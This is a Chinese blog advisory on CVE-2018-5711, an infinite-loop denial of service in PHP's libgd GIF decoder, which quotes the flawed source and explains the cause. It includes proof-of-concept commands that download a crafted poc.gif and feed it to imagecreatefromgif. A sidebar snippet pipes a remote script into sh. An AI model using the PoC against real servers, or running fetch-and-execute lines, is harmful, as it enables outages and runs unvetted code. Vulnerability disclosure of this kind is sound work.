PHP Libgd存在拒绝服务漏洞一张GIF可能导致服务器宕机

最新推荐文章于 2023-11-23 20:47:25 发布
最新推荐文章于 2023-11-23 20:47:25 发布
阅读量2k 收藏
点赞数
分类专栏: 安全预警 漏洞分析 文章标签: PHP libgd 漏洞 php-gd 预警公告
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuegeweiwu/article/details/79314841
版权

PHP GD Graphics Library存在拒绝服务漏洞-CVE-2018-5711(CNVD收录编号为CNVD-2018-02505),可导致服务器计算资源大量消耗,直至崩溃宕机。

GD Graphics Library(libgd)是用来动态创建图像的开源图形软件库,主要用在图像验证码、头像、网络相册等方面,用户使用十分广泛。GD图形库中的gd_gif_in.c存在整数签名错误,通过特殊构造的GIF文件使程序在调用imagecreatefromgif或imagecreatefromstring的PHP函数时导致无限循环。漏洞细节及利用代码在互联网公开,使用GD库处理图像的站点基本上会中招,危害较大。

出现漏洞的文件为 ext/gd/libgd/gd_gif_in.c 具体代码如下:

do {
                        sd->firstcode = sd->oldcode =
                        GetCode(fd, &sd->scd, sd->code_size, FALSE, ZeroDataBlockP);
                } while (sd->firstcode == sd->clear_code);

static int
GetCode_(gdIOCtx *fd, CODE_STATIC_DATA *scd, int code_size, int flag, int *ZeroDataBlockP)
{
        int           i, j, ret;
        unsigned char count;

        if (flag) {
                scd->curbit = 0;
                scd->lastbit = 0;
                scd->last_byte = 0;
                scd->done = FALSE;
                return 0;
        }

        if ( (scd->curbit + code_size) >= scd->lastbit) {
                if (scd->done) {
                        if (scd->curbit >= scd->lastbit) {
                                /* Oh well */
                        }
                        return -1;
                }
                scd->buf[0] = scd->buf[scd->last_byte-2];
                scd->buf[1] = scd->buf[scd->last_byte-1];

               if ((count = GetDataBlock(fd, &scd->buf[2], ZeroDataBlockP)) <= 0)
                        scd->done = TRUE;

                scd->last_byte = 2 + count;
                scd->curbit = (scd->curbit - scd->lastbit) + 16;
                scd->lastbit = (2+count)*8 ;
        }

        if ((scd->curbit + code_size - 1) >= (CSD_BUF_SIZE * 8)) {
                ret = -1;
        } else {
                ret = 0;
                for (i = scd->curbit, j = 0; j < code_size; ++i, ++j) {
                        ret |= ((scd->buf[i / 8] & (1 << (i % 8))) != 0) << j;
                }
        }

        scd->curbit += code_size;
        return ret;
}

GetCode会调用GetDataBlock函数读取GIF图中的数据。

static int
GetDataBlock_(gdIOCtx *fd, unsigned char *buf, int *ZeroDataBlockP)
{
        unsigned char   count;

        if (! ReadOK(fd,&count,1)) {
                return -1;
        }

        *ZeroDataBlockP = count == 0;

        if ((count != 0) && (! ReadOK(fd, buf, count))) {
                return -1;
        }

        return count;
}

该漏洞依赖于从整形(int)到无符号字符(unsigned char)的类型转换。如果GetDataBlock_返回-1,则第400行中的scd->done将会被设置为True,并停止while循环。但是其定义的count是无符号字符,它总是从0到255的正数,所以这种循环停止动作是不会被触发执行的,远程攻击者通过构造的GIF文件调用PHP函数imagecreatefromgif或imagecreatefromstring可导致无限循环,耗尽服务器资源,造成拒绝服务攻击。

POC:

$ curl https://gist.githubusercontent.com/orangetw/adb0e2519df267eb54d8b68027a91d4c/raw/7a7d6938f59dd89e9a9b7304d71f8f6640609479/poc.gif.xxd | xxd -r > poc.gif

$ php -r 'imagecreatefromgif("poc.gif");'

Linux 直接调用函数进行测试如下:


Windows 搭建WEB环境测试如下:


解决方案:

PHP厂商已在最新版本中修复了该漏洞:http://php.net/downloads.php

Libgd暂未发布新版本,请及时关注厂商主页:http://libgd.github.io/

参考链接:

http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5711

http://www.cnvd.org.cn/webinfo/show/4405



Secguard
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
搭建php mysql数据库服务器_NGINX+PHP+MYSQL服务器环境搭建
weixin_34055902的博客
01-19 405
这条命令是配置vim的,请确保你能访问githubwget -qO- https://raw.github.com/ma6174/vim/master/setup.sh | sh说明有一些小问题,配置过程中很容易自己修改,自己注意准备篇:CentOS 7.0系统安装配置图解教程一、配置防火墙,开启80端口、3306端口CentOS 7.0默认使用的是firewall作为防火墙,这里改为iptabl...
Nginx服务器中用于生成缩略图的模块配置教程
01-10
ngx_image_thumb模块生成...编译前请确认您的系统已经安装了libcurl-dev libgd2-dev libpcre-dev 依赖库 1.1 Debian / Ubuntu 系统举例 # 如果你没有安装GCC相关环境才需要执行 $ sudo apt-get install build-essenti
php服务宕机,PHP漏洞|一张GIF图片就能让服务器宕机PHP漏洞
weixin_36170766的博客
03-10 182
原标题:PHP漏洞|一张GIF图片就能让服务器宕机PHP漏洞最近,台湾Web漏洞挖掘大牛Orange Tsai在对一些Web开发框架和程序实现模块进行安全审核的过程中,发现了一些有意思的漏洞。就比如说,这个PHPCVE-2018-5711,它能用一张GIF图片就可导致服务器发生崩溃直至宕机,在现实中非常容易利用。在此,Orange Tsai简单地介绍了这个漏洞漏洞影响的PHP版本 包含以下P...
php 2018 5711,最近GD拒绝服务漏洞分析与EXP构造(CVE-2018-5711)
weixin_42322686的博客
04-06 145
摘要最近爆出PHP GD拒绝服务攻击漏洞,影响的版本比较多。官方上有漏洞的报告,但是看下来还是有不懂的地方,于是下载源码自己分析下。0x00 前言最近爆出PHP GD拒绝服务攻击漏洞,影响的版本比较多。官方上有漏洞的报告,但是看下来还是有不懂的地方,于是下载源码自己分析下。0x01 漏洞分析There is a do-while in file `ext/gd/libgd/gd_gif_in....
php+cve+2018+5711,最近GD拒绝服务漏洞分析与EXP构造(CVE-2018-5711)
weixin_30932183的博客
04-06 472
0x00 前言最近爆出PHP GD拒绝服务0x01There is a do-while in file `ext/gd/libgd/gd_gif_in.c` and function `LWZReadByte_`do{sd->firstcode = sd->oldcode =GetCode(fd, &sd->scd, sd->code_size, FALSE, ...
CVE-2018-5711:PHP GD拒绝服务漏洞
weixin_34087301的博客
02-08 555
阿里云发布的PHP高危漏洞 这肯定要修补啊,官方解决方案就是升级到最新版 升级过程就不说了编译----安装期间各种BUG,很恶心 事后,觉得这漏洞还挺好,就给大家转载下有时间的可以自己测试下不要捣蛋哦,小朋友们 PoC 下载捣蛋文件$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif 本机函数测试$ php -r 'imagecreatefro...
php服务器安装前准备工作,Linux下LAMP环境的安装
weixin_36393718的博客
03-27 95
学习PHP脚本编程语言之前,必须先搭建并熟悉开发环境,开发环境有很多种,例如LAMP、WAMP、MAMP等。这里我介绍一下LAMP环境的搭建,即Linux、Apache、MySQL、PHP环境。一、首先安装操作系统操作系统:CentOS5.8IP地址:172.30.8.240网关:172.30.9.254DNS:172.30.9.1 172.30.8.1操作系统安装步骤,此处不在给出截图。备注:服...
Ubuntu系统搭建nginx服务器
m0_53820609的博客
11-23 928
评论区的小伙伴们,你们觉得怎么样呢,关注我,为您解答。
Web服务器的配置与安装ssl证书
开摆工作室(kbai.cc)
04-03 797
主流网页服务器安装与配置以及安装ssl证书,二级域名配置文件,错误跳转。
Apache服务器基础教程-02从源码安装PHP
极客开发者的博客
04-24 283
Apache服务器基础教程-02从源码安装PHP 一、工具 Ubuntu 16.04 Server php-7.3.4.tar.gz 源码包 PHP官网源码下载链接:https://www.php.net/downloads.php 在Apache中安装PHP,就是让Apache支持对PHP代码的解析,废话不多说,准备开始。 二、安装步骤 安装php依赖环境 配置编译参数 编译与安装 配...
让你的PHP同时支持GIF、png、JPEG
12-17
默认情况下,某些版本的GD可能只支持特定的图像格式,例如在描述中提到的情况,PHP在RedHat 6.2上编译安装后只能处理GIF图像,而无法处理JPEG图像。 描述中提到了解决这个问题的步骤: 1. **Jpeg6b的安装**:...
libgd-2.3.0.tar.gz
11-20
3. 图像处理服务:在服务器端,libgd可用于处理用户上传的图片,如缩放、裁剪、水印等。 总结,libgd-2.3.0作为libgd库的一个版本,不仅提供了一套强大的图形处理工具,还在性能和兼容性上做了优化,对于需要进行...
php图形库libgd2.1
09-17
libgd库主要用于创建和操作各种图像格式,如PNG、JPEG、GIF、BMP等,同时也支持动态格式如GDGD2。在描述“libgd gd2.1 for apache php”中,强调了这个库是为Apache服务器上的PHP环境设计的,这意味着它可以与PHP...
vcpkg-libgd-2.3.3-windows-x86-64.zip
09-23
**vcpkg-libgd-2.3.3-windows-x86-64.zip** 是一个包含针对Windows平台的x86-64架构编译的libgd库的压缩包文件。libgd是一个开源的C语言库,主要用于创建和处理GDGraphics Draw)格式的图像,支持多种图像类型如...
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
最新发布
07-27
[毕设]Delphi题库管理与试卷自动生成系统
131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+图像识别与定位+该数据集相关的研究论文
07-27
<项目介绍> 包含131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+该数据集相关的研究论文。可供深度学习图像识别与定位。 - 训练集大小:67700 个图像 测试集大小:22888 个图像 文件名格式:image_index_100.jpg(例如 32_100.jpg)或 r_image_index_100.jpg(例如 r_32_100.jpg)或 r2_image_index_100.jpg 或 r3_image_index_100.jpg。 “r”代表旋转水果。 “r2”表示水果绕第三轴旋转。 “100”来自图像尺寸(100x100 像素)。 水果是如何拍摄的: 1:使用 C920 摄像机拍摄水果。最好的网络摄像头之一。 2:在水果后面,我们放了一张白纸作为背景。 3:将水果和蔬菜种植在低速电机(3转/分钟)的轴中,并录制一段20秒的短片。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
linux libgd安装
09-03
要在Linux上安装libgd,您可以按照以下步骤进行操作: 1. 首先,确保您的系统已经安装了开发工具链(如GCC编译器)和其他必需的构建工具。您可以使用以下命令来安装它们(适用于基于Debian/Ubuntu的系统): ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值